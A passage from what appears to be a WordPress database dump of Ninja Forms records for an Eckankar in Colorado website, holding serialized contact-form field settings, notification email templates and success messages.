<td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n\";}s:2:\"id\";i:150;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2020-12-08 15:42:53\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:679:\"<div style=\"text-align: center\"><span style=\"font-size: 30pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span></div>\n\n<div style=\"text-align: center\">&nbsp;</div>\n\n<div style=\"text-align: center\"><span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us.<br>Your message has been forwarded to the \'Spiritual Services Director\' here in Colorado.<div style=\"text-align: center\">&nbsp;</div>\n\n<div style=\"text-align: center\">You will be contacted soon regarding your submission.</div>\n\n<div style=\"text-align: center\">&nbsp;</div>\n\n<div style=\"text-align: center\">All the best,<i>The Eckankar in Colorado Team</i><br></div>\n\n</div>\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:151;}i:3;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2020-12-08 15:42:53\";s:5:\"label\";s:11:\"Admin Email\";s:14:\"drawerDisabled\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:33:\"Eckankar In Colorado Contact Form\";s:12:\"from_address\";s:29:\"contact@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:13:\"email_message\";s:2646:\"<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />                                \"><h1> Eckankar In Colorado</h1><br></td><td>&nbsp;</td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr>  <td valign=\"top\" align=\"left\"><p><strong><span style=\"font-size: 20px;\">Hello! You have a new \"Book Discusson Signup\" contact form submission.</span><br><br></strong>This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><p>The following person has requested contact. Here is the information that <strong><span style=\"color: #23507D; font-weight:strong;\">{field:textbox_268}</span></strong> has submitted:</p></td></tr></tbody></table><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />                                \"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong>&nbsp; {field:textbox_268}<br></span><span style=\"color: #333333\"><strong>LAST NAME:</strong>&nbsp; {field:lastname_269}</span><span style=\"color: #333333\"><br></span><span style=\"color: #333333\"><strong>EMAIL:</strong>&nbsp; {field:email_270}<br></span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong>&nbsp; {field:textbox_303}</span><br><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p></td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><br>\";}s:2:\"id\";i:152;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:28:\"Spiritual Services - Contact\";s:10:\"created_at\";s:19:\"2020-12-08 15:42:53\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:14:\"drawerDisabled\";b:0;s:20:\"fieldsMarkedRequired\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:9:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:10:\"submit_278\";}s:10:\"conditions\";a:0:{}s:8:\"last_sub\";s:2:\"36\";s:13:\"sub_limit_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:17:\"not_logged_in_msg\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:11:\"append_page\";s:0:\"\";s:6:\"status\";s:0:\"\";s:12:\"date_updated\";s:19:\"2016-03-03 03:15:50\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:1:{i:360;i:360;}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(39,'a:7:{s:2:\"id\";i:39;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:9:{i:0;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_268\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_268\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:362;}i:1;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_269\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_269\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:363;}i:2;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:4:\"type\";s:5:\"phone\";s:3:\"key\";s:19:\"phone_1599585699152\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:5:\"label\";s:5:\"Phone\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:19:\"phone_1599585699152\";}s:2:\"id\";i:370;}i:3;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_270\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_270\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:364;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:15:\"Message Subject\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_303\";s:11:\"field_label\";s:15:\"Message Subject\";s:9:\"field_key\";s:11:\"textbox_303\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:365;}i:5;a:2:{s:8:\"settings\";a:36:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:30:\"Please Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:44:\"please_enter_your_message_here_1599585729237\";s:11:\"field_label\";s:30:\"Please Enter Your Message Here\";s:9:\"field_key\";s:44:\"please_enter_your_message_here_1599585729237\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:366;}i:6;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:178:\"<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>\";s:3:\"key\";s:8:\"html_305\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_305\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:367;}i:7;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800560932\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"631\";}i:8;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_278\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_278\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:369;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-01-28 10:29:47\";s:5:\"label\";s:9:\"Save Form\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:153;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2021-01-28 10:29:47\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_270}\";s:13:\"email_subject\";s:41:\"Eckankar Colorado Springs - Communication\";s:13:\"email_message\";s:865:\"<p></p><p> </p><h2 style=\"color:#23507d;\"><span style=\"font-weight: normal;\"><b>ECKANKAR IN COLORADO SPRINGS</b> </span></h2><h4>You have created a new form submission on the Eckankar In Colorado website. We will be getting in touch soon!<br></h4><p>Here is a copy of the information you have submitted:</p>  <hr>    <p> First Name:&nbsp; {field:textbox_268}</p><p>Last Name:&nbsp; {field:lastname_269}</p><p>Email:&nbsp; {field:email_270}</p><p>Phone:&nbsp; {field:phone_1599585699152}</p><p>Message Subject:&nbsp; {field:textbox_303}</p><p>Message:&nbsp; {field:please_enter_your_message_here_1599585729237}<br></p>  <hr>    <p>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Utah webmaster: webmaster@eckankar-utah.org</p><p class=\"\"><em>The Eckankar in Utah 